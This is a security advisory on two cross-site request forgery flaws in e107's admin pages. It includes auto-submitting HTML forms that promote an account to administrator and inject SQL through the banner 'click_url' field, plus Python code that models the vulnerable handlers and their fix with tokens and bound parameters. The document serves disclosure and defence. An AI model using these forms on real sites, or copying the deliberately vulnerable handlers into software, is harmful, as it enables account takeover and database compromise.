Cross-site request forgery (CSRF) in e107

2010-04-05T00:00:00
ID HTB22344
Type htbridge
Reporter High-Tech Bridge
Modified 2010-04-05T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered two CSRF vulnerabilities in e107. By tricking a logged-in administrator into loading a page under attacker control, a remote attacker can grant the administrator role to an existing account and, through an unsanitized parameter reachable over the same CSRF vector, execute arbitrary SQL commands in the application's database, gaining complete control over the application.

1) Cross-site request forgery in e107

1.1 The vulnerability is caused by insufficient validation of HTTP requests in /e107_admin/users.php: the script performs the requested user action without checking that the request originated from the site itself. A remote attacker can trick a logged-in administrator into visiting a specially crafted web page and assign the administrator role to an arbitrary existing account.

Exploitation example:

<form method="POST" action="http://host/e107_admin/users.php" name="main">
<!-- userid: existing account to promote; useraction=admin: grant the administrator role -->
<input type="hidden" name="userid" value="2">
<input type="hidden" name="userip" value="1.2.3.4">
<input type="hidden" name="useraction" value="admin">
</form>
<script>
// Submits automatically when the administrator loads the page; the browser
// attaches the admin's e107 session cookie, so the request is treated as theirs.
document.main.submit();
</script>
1.2 The vulnerability exists due to insufficient validation of the request origin in /e107_admin/banner.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and create or update arbitrary banners.
Additionally, the "click_url" parameter in /e107_admin/banner.php is not properly sanitized before being used in a SQL query. Because the same script lacks CSRF protection, a remote attacker can deliver the injection through the CSRF vector and execute arbitrary SQL commands in the application's database.
Exploitation examples:

<form action="http://host/e107_admin/banner.php" method="POST" name="f">
<!-- Creates a banner of the attacker's choosing on behalf of the administrator -->
<input type="hidden" name="banner_campaign_sel" value="campaign_one">
<input type="hidden" name="banner_campaign" value="">
<input type="hidden" name="banner_client_sel" value="e107">
<input type="hidden" name="client_name" value="">
<input type="hidden" name="client_login" value="e107login">
<input type="hidden" name="client_password" value="e107password">
<input type="hidden" name="click_url" value="http%3A%2F%2Fgoogle.com%2F">
<input type="hidden" name="impressions_purchased" value="0">
<input type="hidden" name="banner_class" value="0">
<input type="hidden" name="createbanner" value="Create+New+Banner">
</form>
<script>
document.f.submit();
</script>

<form action="http://host/e107_admin/banner.php" method="POST" name="f">
<!-- Same endpoint; click_url breaks out of the quoted SQL value (ANY_SQL_HERE is a placeholder) -->
<input type="hidden" name="createbanner" value="Create+New+Banner">
<input type="hidden" name="click_url" value="' ANY_SQL_HERE ">
</form>
<script>
document.f.submit();
</script>
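As an added illustration, not part of the original advisory and not e107's own code: a Python model of the two handlers described above (users.php promoting an account, banner.php storing click_url) and the fix a maintainer would apply. The user and banner tables, the session dictionary and the forged request dictionaries are all constructed assumptions. It shows why a cross-site form succeeds against the unprotected handlers, how a per-session synchronizer token blocks the forged POSTs to both endpoints, and why binding click_url as a query parameter stores the injection string literally instead of evaluating it.

```python
# Added example (not e107's code): models the advisory's two defects and the fix.
# Table/column names, request dicts and the session dict are hypothetical.
import hmac
import secrets
import sqlite3

# Payload in the shape of the advisory's click_url injection: closes the quoted
# value and concatenates a subquery result into the stored URL.
INJECTED_CLICK_URL = "' || (SELECT user_name FROM user WHERE user_admin=1) || '"


def make_db():
    """In-memory stand-in for the application database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (user_id INTEGER PRIMARY KEY, user_name TEXT, user_admin INTEGER)")
    db.execute("CREATE TABLE banner (banner_id INTEGER PRIMARY KEY, client_name TEXT, click_url TEXT)")
    db.execute("INSERT INTO user VALUES (1, 'root', 1), (2, 'mallory', 0)")
    db.commit()
    return db


def vulnerable_create_banner(db, post):
    """banner.php as described: no origin check, click_url interpolated into SQL."""
    sql = ("INSERT INTO banner (client_name, click_url) "
           f"VALUES ('{post['client_name']}', '{post['click_url']}')")
    db.execute(sql)
    db.commit()


def vulnerable_set_admin(db, post):
    """users.php as described: any POST carrying useraction=admin is honoured."""
    if post.get("useraction") == "admin":
        db.execute(f"UPDATE user SET user_admin=1 WHERE user_id={post['userid']}")
        db.commit()


def issue_csrf_token(session):
    """Synchronizer token: random, kept server-side in the admin's session and
    rendered into the site's own form; a third-party page cannot read it."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def require_csrf_token(session, post):
    """Reject the request unless it carries the token bound to this session."""
    expected = session.get("csrf_token")
    supplied = post.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        raise PermissionError("CSRF token missing or invalid")


def hardened_create_banner(db, session, post):
    require_csrf_token(session, post)
    # Bound parameter: the value is stored verbatim, never parsed as SQL.
    db.execute("INSERT INTO banner (client_name, click_url) VALUES (?, ?)",
               (post["client_name"], post["click_url"]))
    db.commit()


def hardened_set_admin(db, session, post):
    require_csrf_token(session, post)
    if post.get("useraction") == "admin":
        db.execute("UPDATE user SET user_admin=1 WHERE user_id=?", (int(post["userid"]),))
        db.commit()


def is_admin(db, user_id):
    return bool(db.execute("SELECT user_admin FROM user WHERE user_id=?", (user_id,)).fetchone()[0])


def demo():
    """Replays the forged requests against both handler variants."""
    # What a cross-site form can send: the admin's cookie rides along, but the
    # attacker's page cannot know a per-session token, so none is included.
    forged_banner = {"client_name": "e107", "click_url": INJECTED_CLICK_URL}
    forged_admin = {"userid": "2", "useraction": "admin"}

    vuln_db = make_db()
    vulnerable_create_banner(vuln_db, forged_banner)
    vulnerable_set_admin(vuln_db, forged_admin)
    leaked = vuln_db.execute("SELECT click_url FROM banner").fetchone()[0]  # admin's name, not a URL

    safe_db, session, blocked = make_db(), {}, 0
    for handler, post in ((hardened_create_banner, forged_banner), (hardened_set_admin, forged_admin)):
        try:
            handler(safe_db, session, post)
        except PermissionError:
            blocked += 1
    # Legitimate submission: the form rendered by the site carries the token.
    token = issue_csrf_token(session)
    hardened_create_banner(safe_db, session, dict(forged_banner, csrf_token=token))
    stored = safe_db.execute("SELECT click_url FROM banner ORDER BY banner_id DESC LIMIT 1").fetchone()[0]
    return {"leaked": leaked, "promoted_by_forgery": is_admin(vuln_db, 2),
            "forged_requests_blocked": blocked, "stored_literally": stored == INJECTED_CLICK_URL,
            "still_admin": is_admin(safe_db, 2)}


if __name__ == "__main__":
    print(demo())
```

The token check alone closes both CSRF issues, but it does not make the injection safe: an administrator submitting the real form could still inject, so the parameter binding is a separate fix, not a consequence of the first. Checking the Origin or Referer header and marking the session cookie SameSite are useful defense in depth, but neither replaces the per-session token.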